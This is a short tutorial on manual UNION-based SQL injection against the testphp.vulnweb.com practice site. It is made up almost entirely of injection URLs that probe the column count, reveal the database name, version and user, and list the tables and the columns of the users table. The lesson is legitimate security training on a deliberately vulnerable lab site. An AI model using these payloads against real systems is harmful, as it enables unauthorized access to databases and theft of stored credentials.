Manual sql injection step by step

http://testphp.vulnweb.com/login.php

	Click on artists and choose an artist. Notice the URL:
http://testphp.vulnweb.com/artists.php?artist=1
	break the query to get the error:
http://testphp.vulnweb.com/artists.php?artist=1'
	Check how many tables we have:
http://testphp.vulnweb.com/artists.php?artist=1 order by 1
http://testphp.vulnweb.com/artists.php?artist=1 order by 2
http://testphp.vulnweb.com/artists.php?artist=1 order by 3
http://testphp.vulnweb.com/artists.php?artist=1 order by 4

	Union with another query from the same table:
http://testphp.vulnweb.com/artists.php?artist=1 union select 1,2,3

	No change, however the query worked(no error). Pass -1 as an argument in order not to have an answer to the first, but to the second query(the one after union):
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3

    Notice where everything appears in the frontend.
	Find out the database , version and current user name:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,database(),3
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,version(),3
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,current_user(),3

    Get the table names:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 2,1
.......................................
    Get all the table names in one string:
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
    Get the columns from one interesting table(in our case, users):
http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
	





